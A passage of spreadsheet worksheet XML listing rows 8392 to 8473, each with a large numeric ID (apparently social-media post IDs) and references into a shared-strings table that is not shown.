      <c r="C8392" t="s">
        <v>1</v>
      </c>
      <c r="D8392" t="s">
        <v>20220</v>
      </c>
      <c r="E8392" t="s">
        <v>20221</v>
      </c>
    </row>
    <row r="8393" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8393">
        <v>1.2328070612573199E+18</v>
      </c>
      <c r="B8393" t="s">
        <v>20222</v>
      </c>
      <c r="C8393" t="s">
        <v>1</v>
      </c>
      <c r="D8393" t="s">
        <v>20223</v>
      </c>
      <c r="E8393" t="s">
        <v>6332</v>
      </c>
    </row>
    <row r="8394" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8394">
        <v>1.23280610713697E+18</v>
      </c>
      <c r="B8394" t="s">
        <v>20224</v>
      </c>
      <c r="C8394" t="s">
        <v>1</v>
      </c>
      <c r="D8394" t="s">
        <v>20225</v>
      </c>
      <c r="E8394" t="s">
        <v>20210</v>
      </c>
    </row>
    <row r="8395" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8395">
        <v>1.2328059781664499E+18</v>
      </c>
      <c r="B8395" t="s">
        <v>20226</v>
      </c>
      <c r="C8395" t="s">
        <v>1</v>
      </c>
      <c r="D8395" t="s">
        <v>20227</v>
      </c>
      <c r="E8395" t="s">
        <v>7334</v>
      </c>
    </row>
    <row r="8396" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8396">
        <v>1.2328058973296699E+18</v>
      </c>
      <c r="B8396" t="s">
        <v>20228</v>
      </c>
      <c r="C8396" t="s">
        <v>1</v>
      </c>
      <c r="D8396" t="s">
        <v>20229</v>
      </c>
      <c r="E8396" t="s">
        <v>20230</v>
      </c>
    </row>
    <row r="8397" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8397">
        <v>1.2328053111546501E+18</v>
      </c>
      <c r="B8397" t="s">
        <v>20231</v>
      </c>
      <c r="C8397" t="s">
        <v>1</v>
      </c>
      <c r="D8397" t="s">
        <v>20232</v>
      </c>
      <c r="E8397" t="s">
        <v>18508</v>
      </c>
    </row>
    <row r="8398" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8398">
        <v>1.23280529686047E+18</v>
      </c>
      <c r="B8398" t="s">
        <v>20233</v>
      </c>
      <c r="C8398" t="s">
        <v>1</v>
      </c>
      <c r="D8398" t="s">
        <v>20234</v>
      </c>
      <c r="E8398" t="s">
        <v>15665</v>
      </c>
    </row>
    <row r="8399" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8399">
        <v>1.23280507237712E+18</v>
      </c>
      <c r="B8399" t="s">
        <v>20235</v>
      </c>
      <c r="C8399" t="s">
        <v>1</v>
      </c>
      <c r="D8399" t="s">
        <v>20236</v>
      </c>
      <c r="E8399" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="8400" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8400">
        <v>1.23280378571567E+18</v>
      </c>
      <c r="B8400" t="s">
        <v>20237</v>
      </c>
      <c r="C8400" t="s">
        <v>1</v>
      </c>
      <c r="D8400" t="s">
        <v>20238</v>
      </c>
      <c r="E8400" t="s">
        <v>20239</v>
      </c>
    </row>
    <row r="8401" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8401">
        <v>1.23280358977039E+18</v>
      </c>
      <c r="B8401" t="s">
        <v>20240</v>
      </c>
      <c r="C8401" t="s">
        <v>1</v>
      </c>
      <c r="D8401" t="s">
        <v>20241</v>
      </c>
      <c r="E8401" t="s">
        <v>7085</v>
      </c>
    </row>
    <row r="8402" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8402">
        <v>1.2328033328063201E+18</v>
      </c>
      <c r="B8402" t="s">
        <v>20242</v>
      </c>
      <c r="C8402" t="s">
        <v>1</v>
      </c>
      <c r="D8402" t="s">
        <v>20243</v>
      </c>
      <c r="E8402" t="s">
        <v>10332</v>
      </c>
    </row>
    <row r="8403" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8403">
        <v>1.23280307494878E+18</v>
      </c>
      <c r="B8403" t="s">
        <v>20244</v>
      </c>
      <c r="C8403" t="s">
        <v>1</v>
      </c>
      <c r="D8403" t="s">
        <v>20245</v>
      </c>
      <c r="E8403" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="8404" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8404">
        <v>1.2328029994261499E+18</v>
      </c>
      <c r="B8404" t="s">
        <v>20246</v>
      </c>
      <c r="C8404" t="s">
        <v>1</v>
      </c>
      <c r="D8404" t="s">
        <v>20247</v>
      </c>
      <c r="E8404" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="8405" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8405">
        <v>1.23280290754992E+18</v>
      </c>
      <c r="B8405" t="s">
        <v>20248</v>
      </c>
      <c r="C8405" t="s">
        <v>1</v>
      </c>
      <c r="D8405" t="s">
        <v>20249</v>
      </c>
      <c r="E8405" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="8406" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8406">
        <v>1.23280280948706E+18</v>
      </c>
      <c r="B8406" t="s">
        <v>20250</v>
      </c>
      <c r="C8406" t="s">
        <v>1</v>
      </c>
      <c r="D8406" t="s">
        <v>20251</v>
      </c>
      <c r="E8406" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="8407" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8407">
        <v>1.232802778592E+18</v>
      </c>
      <c r="B8407" t="s">
        <v>20252</v>
      </c>
      <c r="C8407" t="s">
        <v>1</v>
      </c>
      <c r="D8407" t="s">
        <v>20253</v>
      </c>
      <c r="E8407" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="8408" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8408">
        <v>1.2328026174214899E+18</v>
      </c>
      <c r="B8408" t="s">
        <v>20254</v>
      </c>
      <c r="C8408" t="s">
        <v>1</v>
      </c>
      <c r="D8408" t="s">
        <v>20255</v>
      </c>
      <c r="E8408" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="8409" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8409">
        <v>1.23280259955809E+18</v>
      </c>
      <c r="B8409" t="s">
        <v>20256</v>
      </c>
      <c r="C8409" t="s">
        <v>1</v>
      </c>
      <c r="D8409" t="s">
        <v>20257</v>
      </c>
      <c r="E8409" t="s">
        <v>4817</v>
      </c>
    </row>
    <row r="8410" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8410">
        <v>1.2328025306667E+18</v>
      </c>
      <c r="B8410" t="s">
        <v>20258</v>
      </c>
      <c r="C8410" t="s">
        <v>1</v>
      </c>
      <c r="D8410" t="s">
        <v>20259</v>
      </c>
      <c r="E8410" t="s">
        <v>5923</v>
      </c>
    </row>
    <row r="8411" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8411">
        <v>1.23280232460877E+18</v>
      </c>
      <c r="B8411" t="s">
        <v>20260</v>
      </c>
      <c r="C8411" t="s">
        <v>1</v>
      </c>
      <c r="D8411" t="s">
        <v>12001</v>
      </c>
      <c r="E8411" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="8412" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8412">
        <v>1.2328020882389499E+18</v>
      </c>
      <c r="B8412" t="s">
        <v>20261</v>
      </c>
      <c r="C8412" t="s">
        <v>1</v>
      </c>
      <c r="D8412" t="s">
        <v>20262</v>
      </c>
      <c r="E8412" t="s">
        <v>20263</v>
      </c>
    </row>
    <row r="8413" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8413">
        <v>1.2328015955759501E+18</v>
      </c>
      <c r="B8413" t="s">
        <v>20264</v>
      </c>
      <c r="C8413" t="s">
        <v>1</v>
      </c>
      <c r="D8413" t="s">
        <v>20265</v>
      </c>
      <c r="E8413" t="s">
        <v>20266</v>
      </c>
    </row>
    <row r="8414" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8414">
        <v>1.23280107131299E+18</v>
      </c>
      <c r="B8414" t="s">
        <v>20267</v>
      </c>
      <c r="C8414" t="s">
        <v>1</v>
      </c>
      <c r="D8414" t="s">
        <v>20268</v>
      </c>
      <c r="E8414" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="8415" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8415">
        <v>1.2328008115681201E+18</v>
      </c>
      <c r="B8415" t="s">
        <v>20269</v>
      </c>
      <c r="C8415" t="s">
        <v>1</v>
      </c>
      <c r="D8415" t="s">
        <v>20270</v>
      </c>
      <c r="E8415" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="8416" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8416">
        <v>1.23280001694477E+18</v>
      </c>
      <c r="B8416" t="s">
        <v>20271</v>
      </c>
      <c r="C8416" t="s">
        <v>1</v>
      </c>
      <c r="D8416" t="s">
        <v>20272</v>
      </c>
      <c r="E8416" t="s">
        <v>19188</v>
      </c>
    </row>
    <row r="8417" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8417">
        <v>1.2327998993742999E+18</v>
      </c>
      <c r="B8417" t="s">
        <v>20273</v>
      </c>
      <c r="C8417" t="s">
        <v>1</v>
      </c>
      <c r="D8417" t="s">
        <v>20274</v>
      </c>
      <c r="E8417" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8418" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8418">
        <v>1.23279984853087E+18</v>
      </c>
      <c r="B8418" t="s">
        <v>20275</v>
      </c>
      <c r="C8418" t="s">
        <v>1</v>
      </c>
      <c r="D8418" t="s">
        <v>20276</v>
      </c>
      <c r="E8418" t="s">
        <v>20277</v>
      </c>
    </row>
    <row r="8419" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8419">
        <v>1.2327998173672399E+18</v>
      </c>
      <c r="B8419" t="s">
        <v>20278</v>
      </c>
      <c r="C8419" t="s">
        <v>1</v>
      </c>
      <c r="D8419" t="s">
        <v>20279</v>
      </c>
      <c r="E8419" t="s">
        <v>20280</v>
      </c>
    </row>
    <row r="8420" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8420">
        <v>1.23279956820883E+18</v>
      </c>
      <c r="B8420" t="s">
        <v>20281</v>
      </c>
      <c r="C8420" t="s">
        <v>1</v>
      </c>
      <c r="D8420" t="s">
        <v>20282</v>
      </c>
      <c r="E8420" t="s">
        <v>1024</v>
      </c>
    </row>
    <row r="8421" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8421">
        <v>1.23279937296398E+18</v>
      </c>
      <c r="B8421" t="s">
        <v>20283</v>
      </c>
      <c r="C8421" t="s">
        <v>1</v>
      </c>
      <c r="D8421" t="s">
        <v>20284</v>
      </c>
      <c r="E8421" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8422" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8422">
        <v>1.23279934922003E+18</v>
      </c>
      <c r="B8422" t="s">
        <v>20285</v>
      </c>
      <c r="C8422" t="s">
        <v>1</v>
      </c>
      <c r="D8422" t="s">
        <v>20286</v>
      </c>
      <c r="E8422" t="s">
        <v>20287</v>
      </c>
    </row>
    <row r="8423" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8423">
        <v>1.2327993181905001E+18</v>
      </c>
      <c r="B8423" t="s">
        <v>20288</v>
      </c>
      <c r="C8423" t="s">
        <v>1</v>
      </c>
      <c r="D8423" t="s">
        <v>2014</v>
      </c>
      <c r="E8423" t="s">
        <v>2015</v>
      </c>
    </row>
    <row r="8424" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8424">
        <v>1.2327987961631201E+18</v>
      </c>
      <c r="B8424" t="s">
        <v>20289</v>
      </c>
      <c r="C8424" t="s">
        <v>1</v>
      </c>
      <c r="D8424" t="s">
        <v>20290</v>
      </c>
      <c r="E8424" t="s">
        <v>14670</v>
      </c>
    </row>
    <row r="8425" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8425">
        <v>1.2327983443987799E+18</v>
      </c>
      <c r="B8425" t="s">
        <v>20291</v>
      </c>
      <c r="C8425" t="s">
        <v>1</v>
      </c>
      <c r="D8425" t="s">
        <v>20292</v>
      </c>
      <c r="E8425" t="s">
        <v>20293</v>
      </c>
    </row>
    <row r="8426" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8426">
        <v>1.2327981610240399E+18</v>
      </c>
      <c r="B8426" t="s">
        <v>20294</v>
      </c>
      <c r="C8426" t="s">
        <v>1</v>
      </c>
      <c r="D8426" t="s">
        <v>20295</v>
      </c>
      <c r="E8426" t="s">
        <v>14240</v>
      </c>
    </row>
    <row r="8427" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8427">
        <v>1.2327979401350999E+18</v>
      </c>
      <c r="B8427" t="s">
        <v>20296</v>
      </c>
      <c r="C8427" t="s">
        <v>1</v>
      </c>
      <c r="D8427" t="s">
        <v>20297</v>
      </c>
      <c r="E8427" t="s">
        <v>20298</v>
      </c>
    </row>
    <row r="8428" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8428">
        <v>1.2327974393352599E+18</v>
      </c>
      <c r="B8428" t="s">
        <v>20299</v>
      </c>
      <c r="C8428" t="s">
        <v>1</v>
      </c>
      <c r="D8428" t="s">
        <v>20300</v>
      </c>
      <c r="E8428" t="s">
        <v>5248</v>
      </c>
    </row>
    <row r="8429" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8429">
        <v>1.23279658162111E+18</v>
      </c>
      <c r="B8429" t="s">
        <v>20301</v>
      </c>
      <c r="C8429" t="s">
        <v>1</v>
      </c>
      <c r="D8429" t="s">
        <v>20302</v>
      </c>
      <c r="E8429" t="s">
        <v>1565</v>
      </c>
    </row>
    <row r="8430" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8430">
        <v>1.23279657108495E+18</v>
      </c>
      <c r="B8430" t="s">
        <v>20303</v>
      </c>
      <c r="C8430" t="s">
        <v>1</v>
      </c>
      <c r="D8430" t="s">
        <v>20304</v>
      </c>
      <c r="E8430" t="s">
        <v>14252</v>
      </c>
    </row>
    <row r="8431" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8431">
        <v>1.2327963894128799E+18</v>
      </c>
      <c r="B8431" t="s">
        <v>20305</v>
      </c>
      <c r="C8431" t="s">
        <v>1</v>
      </c>
      <c r="D8431" t="s">
        <v>20306</v>
      </c>
      <c r="E8431" t="s">
        <v>20307</v>
      </c>
    </row>
    <row r="8432" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8432">
        <v>1.23279629351856E+18</v>
      </c>
      <c r="B8432" t="s">
        <v>20308</v>
      </c>
      <c r="C8432" t="s">
        <v>1</v>
      </c>
      <c r="D8432" t="s">
        <v>20309</v>
      </c>
      <c r="E8432" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="8433" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8433">
        <v>1.23279572683454E+18</v>
      </c>
      <c r="B8433" t="s">
        <v>20310</v>
      </c>
      <c r="C8433" t="s">
        <v>1</v>
      </c>
      <c r="D8433" t="s">
        <v>9897</v>
      </c>
      <c r="E8433" t="s">
        <v>9898</v>
      </c>
    </row>
    <row r="8434" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8434">
        <v>1.2327955458041201E+18</v>
      </c>
      <c r="B8434" t="s">
        <v>20311</v>
      </c>
      <c r="C8434" t="s">
        <v>1</v>
      </c>
      <c r="D8434" t="s">
        <v>20312</v>
      </c>
      <c r="E8434" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="8435" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8435">
        <v>1.2327952907653399E+18</v>
      </c>
      <c r="B8435" t="s">
        <v>20313</v>
      </c>
      <c r="C8435" t="s">
        <v>1</v>
      </c>
      <c r="D8435" t="s">
        <v>20314</v>
      </c>
      <c r="E8435" t="s">
        <v>20315</v>
      </c>
    </row>
    <row r="8436" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8436">
        <v>1.2327952008603799E+18</v>
      </c>
      <c r="B8436" t="s">
        <v>20316</v>
      </c>
      <c r="C8436" t="s">
        <v>1</v>
      </c>
      <c r="D8436" t="s">
        <v>20317</v>
      </c>
      <c r="E8436" t="s">
        <v>4885</v>
      </c>
    </row>
    <row r="8437" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8437">
        <v>1.2327949622800399E+18</v>
      </c>
      <c r="B8437" t="s">
        <v>20318</v>
      </c>
      <c r="C8437" t="s">
        <v>1</v>
      </c>
      <c r="D8437" t="s">
        <v>20319</v>
      </c>
      <c r="E8437" t="s">
        <v>20320</v>
      </c>
    </row>
    <row r="8438" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8438">
        <v>1.23279485487633E+18</v>
      </c>
      <c r="B8438" t="s">
        <v>20321</v>
      </c>
      <c r="C8438" t="s">
        <v>1</v>
      </c>
      <c r="D8438" t="s">
        <v>20322</v>
      </c>
      <c r="E8438" t="s">
        <v>20323</v>
      </c>
    </row>
    <row r="8439" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8439">
        <v>1.23279452067008E+18</v>
      </c>
      <c r="B8439" t="s">
        <v>20324</v>
      </c>
      <c r="C8439" t="s">
        <v>1</v>
      </c>
      <c r="D8439" t="s">
        <v>20325</v>
      </c>
      <c r="E8439" t="s">
        <v>1721</v>
      </c>
    </row>
    <row r="8440" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8440">
        <v>1.2327943581828101E+18</v>
      </c>
      <c r="B8440" t="s">
        <v>20326</v>
      </c>
      <c r="C8440" t="s">
        <v>1</v>
      </c>
      <c r="D8440" t="s">
        <v>20327</v>
      </c>
      <c r="E8440" t="s">
        <v>18103</v>
      </c>
    </row>
    <row r="8441" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8441">
        <v>1.2327938991581701E+18</v>
      </c>
      <c r="B8441" t="s">
        <v>20328</v>
      </c>
      <c r="C8441" t="s">
        <v>1</v>
      </c>
      <c r="D8441" t="s">
        <v>20329</v>
      </c>
      <c r="E8441" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="8442" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8442">
        <v>1.2327938140555699E+18</v>
      </c>
      <c r="B8442" t="s">
        <v>20330</v>
      </c>
      <c r="C8442" t="s">
        <v>1</v>
      </c>
      <c r="D8442" t="s">
        <v>20331</v>
      </c>
      <c r="E8442" t="s">
        <v>20332</v>
      </c>
    </row>
    <row r="8443" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8443">
        <v>1.2327937088541701E+18</v>
      </c>
      <c r="B8443" t="s">
        <v>20333</v>
      </c>
      <c r="C8443" t="s">
        <v>1</v>
      </c>
      <c r="D8443" t="s">
        <v>20334</v>
      </c>
      <c r="E8443" t="s">
        <v>8513</v>
      </c>
    </row>
    <row r="8444" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8444">
        <v>1.23279366729281E+18</v>
      </c>
      <c r="B8444" t="s">
        <v>20335</v>
      </c>
      <c r="C8444" t="s">
        <v>1</v>
      </c>
      <c r="D8444" t="s">
        <v>20336</v>
      </c>
      <c r="E8444" t="s">
        <v>20337</v>
      </c>
    </row>
    <row r="8445" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8445">
        <v>1.2327935020162401E+18</v>
      </c>
      <c r="B8445" t="s">
        <v>20338</v>
      </c>
      <c r="C8445" t="s">
        <v>1</v>
      </c>
      <c r="D8445" t="s">
        <v>20339</v>
      </c>
      <c r="E8445" t="s">
        <v>5130</v>
      </c>
    </row>
    <row r="8446" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8446">
        <v>1.23279295131678E+18</v>
      </c>
      <c r="B8446" t="s">
        <v>20340</v>
      </c>
      <c r="C8446" t="s">
        <v>1</v>
      </c>
      <c r="D8446" t="s">
        <v>20341</v>
      </c>
      <c r="E8446" t="s">
        <v>20342</v>
      </c>
    </row>
    <row r="8447" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8447">
        <v>1.23279282886384E+18</v>
      </c>
      <c r="B8447" t="s">
        <v>20343</v>
      </c>
      <c r="C8447" t="s">
        <v>1</v>
      </c>
      <c r="D8447" t="s">
        <v>20344</v>
      </c>
      <c r="E8447" t="s">
        <v>20345</v>
      </c>
    </row>
    <row r="8448" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8448">
        <v>1.23279270688511E+18</v>
      </c>
      <c r="B8448" t="s">
        <v>20346</v>
      </c>
      <c r="C8448" t="s">
        <v>1</v>
      </c>
      <c r="D8448" t="s">
        <v>20331</v>
      </c>
      <c r="E8448" t="s">
        <v>20347</v>
      </c>
    </row>
    <row r="8449" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8449">
        <v>1.2327926135159301E+18</v>
      </c>
      <c r="B8449" t="s">
        <v>20348</v>
      </c>
      <c r="C8449" t="s">
        <v>1</v>
      </c>
      <c r="D8449" t="s">
        <v>20349</v>
      </c>
      <c r="E8449" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="8450" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8450">
        <v>1.2327924659644401E+18</v>
      </c>
      <c r="B8450" t="s">
        <v>20350</v>
      </c>
      <c r="C8450" t="s">
        <v>1</v>
      </c>
      <c r="D8450" t="s">
        <v>20351</v>
      </c>
      <c r="E8450" t="s">
        <v>1150</v>
      </c>
    </row>
    <row r="8451" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8451">
        <v>1.23279231458787E+18</v>
      </c>
      <c r="B8451" t="s">
        <v>20352</v>
      </c>
      <c r="C8451" t="s">
        <v>1</v>
      </c>
      <c r="D8451" t="s">
        <v>20353</v>
      </c>
      <c r="E8451" t="s">
        <v>5153</v>
      </c>
    </row>
    <row r="8452" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8452">
        <v>1.2327922540555E+18</v>
      </c>
      <c r="B8452" t="s">
        <v>20354</v>
      </c>
      <c r="C8452" t="s">
        <v>1</v>
      </c>
      <c r="D8452" t="s">
        <v>20355</v>
      </c>
      <c r="E8452" t="s">
        <v>18616</v>
      </c>
    </row>
    <row r="8453" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8453">
        <v>1.2327921646288599E+18</v>
      </c>
      <c r="B8453" t="s">
        <v>20356</v>
      </c>
      <c r="C8453" t="s">
        <v>1</v>
      </c>
      <c r="D8453" t="s">
        <v>13229</v>
      </c>
      <c r="E8453" t="s">
        <v>20357</v>
      </c>
    </row>
    <row r="8454" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8454">
        <v>1.23279204919746E+18</v>
      </c>
      <c r="B8454" t="s">
        <v>20358</v>
      </c>
      <c r="C8454" t="s">
        <v>1</v>
      </c>
      <c r="D8454" t="s">
        <v>20359</v>
      </c>
      <c r="E8454" t="s">
        <v>18542</v>
      </c>
    </row>
    <row r="8455" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8455">
        <v>1.2327918399729999E+18</v>
      </c>
      <c r="B8455" t="s">
        <v>20360</v>
      </c>
      <c r="C8455" t="s">
        <v>1</v>
      </c>
      <c r="D8455" t="s">
        <v>20361</v>
      </c>
      <c r="E8455" t="s">
        <v>20362</v>
      </c>
    </row>
    <row r="8456" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8456">
        <v>1.2327917514395799E+18</v>
      </c>
      <c r="B8456" t="s">
        <v>20363</v>
      </c>
      <c r="C8456" t="s">
        <v>1</v>
      </c>
      <c r="D8456" t="s">
        <v>20364</v>
      </c>
      <c r="E8456" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8457" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8457">
        <v>1.23279174986253E+18</v>
      </c>
      <c r="B8457" t="s">
        <v>20365</v>
      </c>
      <c r="C8457" t="s">
        <v>1</v>
      </c>
      <c r="D8457" t="s">
        <v>20366</v>
      </c>
      <c r="E8457" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8458" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8458">
        <v>1.23279161139184E+18</v>
      </c>
      <c r="B8458" t="s">
        <v>20367</v>
      </c>
      <c r="C8458" t="s">
        <v>1</v>
      </c>
      <c r="D8458" t="s">
        <v>20368</v>
      </c>
      <c r="E8458" t="s">
        <v>7547</v>
      </c>
    </row>
    <row r="8459" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8459">
        <v>1.23279146893231E+18</v>
      </c>
      <c r="B8459" t="s">
        <v>20369</v>
      </c>
      <c r="C8459" t="s">
        <v>1</v>
      </c>
      <c r="D8459" t="s">
        <v>20370</v>
      </c>
      <c r="E8459" t="s">
        <v>14276</v>
      </c>
    </row>
    <row r="8460" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8460">
        <v>1.23279123128723E+18</v>
      </c>
      <c r="B8460" t="s">
        <v>20371</v>
      </c>
      <c r="C8460" t="s">
        <v>1</v>
      </c>
      <c r="D8460" t="s">
        <v>20372</v>
      </c>
      <c r="E8460" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="8461" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8461">
        <v>1.23279115252238E+18</v>
      </c>
      <c r="B8461" t="s">
        <v>20373</v>
      </c>
      <c r="C8461" t="s">
        <v>1</v>
      </c>
      <c r="D8461" t="s">
        <v>20374</v>
      </c>
      <c r="E8461" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="8462" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8462">
        <v>1.2327910598031201E+18</v>
      </c>
      <c r="B8462" t="s">
        <v>20375</v>
      </c>
      <c r="C8462" t="s">
        <v>1</v>
      </c>
      <c r="D8462" t="s">
        <v>20376</v>
      </c>
      <c r="E8462" t="s">
        <v>10970</v>
      </c>
    </row>
    <row r="8463" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8463">
        <v>1.23279095964307E+18</v>
      </c>
      <c r="B8463" t="s">
        <v>20377</v>
      </c>
      <c r="C8463" t="s">
        <v>1</v>
      </c>
      <c r="D8463" t="s">
        <v>20378</v>
      </c>
      <c r="E8463" t="s">
        <v>20379</v>
      </c>
    </row>
    <row r="8464" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8464">
        <v>1.2327908663198799E+18</v>
      </c>
      <c r="B8464" t="s">
        <v>20380</v>
      </c>
      <c r="C8464" t="s">
        <v>1</v>
      </c>
      <c r="D8464" t="s">
        <v>20381</v>
      </c>
      <c r="E8464" t="s">
        <v>20382</v>
      </c>
    </row>
    <row r="8465" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8465">
        <v>1.2327905318493E+18</v>
      </c>
      <c r="B8465" t="s">
        <v>20383</v>
      </c>
      <c r="C8465" t="s">
        <v>1</v>
      </c>
      <c r="D8465" t="s">
        <v>20384</v>
      </c>
      <c r="E8465" t="s">
        <v>20385</v>
      </c>
    </row>
    <row r="8466" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8466">
        <v>1.23279045070611E+18</v>
      </c>
      <c r="B8466" t="s">
        <v>20386</v>
      </c>
      <c r="C8466" t="s">
        <v>1</v>
      </c>
      <c r="D8466" t="s">
        <v>20387</v>
      </c>
      <c r="E8466" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="8467" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8467">
        <v>1.2327903439863601E+18</v>
      </c>
      <c r="B8467" t="s">
        <v>20388</v>
      </c>
      <c r="C8467" t="s">
        <v>1</v>
      </c>
      <c r="D8467" t="s">
        <v>20389</v>
      </c>
      <c r="E8467" t="s">
        <v>20390</v>
      </c>
    </row>
    <row r="8468" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8468">
        <v>1.23279018740467E+18</v>
      </c>
      <c r="B8468" t="s">
        <v>20391</v>
      </c>
      <c r="C8468" t="s">
        <v>1</v>
      </c>
      <c r="D8468" t="s">
        <v>20392</v>
      </c>
      <c r="E8468" t="s">
        <v>3645</v>
      </c>
    </row>
    <row r="8469" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8469">
        <v>1.2327900178708301E+18</v>
      </c>
      <c r="B8469" t="s">
        <v>20393</v>
      </c>
      <c r="C8469" t="s">
        <v>1</v>
      </c>
      <c r="D8469" t="s">
        <v>20394</v>
      </c>
      <c r="E8469" t="s">
        <v>4136</v>
      </c>
    </row>
    <row r="8470" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8470">
        <v>1.2327899693595799E+18</v>
      </c>
      <c r="B8470" t="s">
        <v>20395</v>
      </c>
      <c r="C8470" t="s">
        <v>1</v>
      </c>
      <c r="D8470" t="s">
        <v>20396</v>
      </c>
      <c r="E8470" t="s">
        <v>20397</v>
      </c>
    </row>
    <row r="8471" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8471">
        <v>1.2327899584374999E+18</v>
      </c>
      <c r="B8471" t="s">
        <v>20398</v>
      </c>
      <c r="C8471" t="s">
        <v>1</v>
      </c>
      <c r="D8471" t="s">
        <v>20399</v>
      </c>
      <c r="E8471" t="s">
        <v>20400</v>
      </c>
    </row>
    <row r="8472" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8472">
        <v>1.2327899570826099E+18</v>
      </c>
      <c r="B8472" t="s">
        <v>20398</v>
      </c>
      <c r="C8472" t="s">
        <v>1</v>
      </c>
      <c r="D8472" t="s">
        <v>20401</v>
      </c>
      <c r="E8472" t="s">
        <v>13334</v>
      </c>
    </row>
    <row r="8473" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8473">
        <v>1.23278973133695E+18</v>
      </c>
      <c r="B8473" t="s">
        <v>20402</v>
      </c>
      <c r="C8473" t="s">
        <v>1</v>
      </c>
      <c r="D8473" t="s">
        <v>20403</v>
      </c>
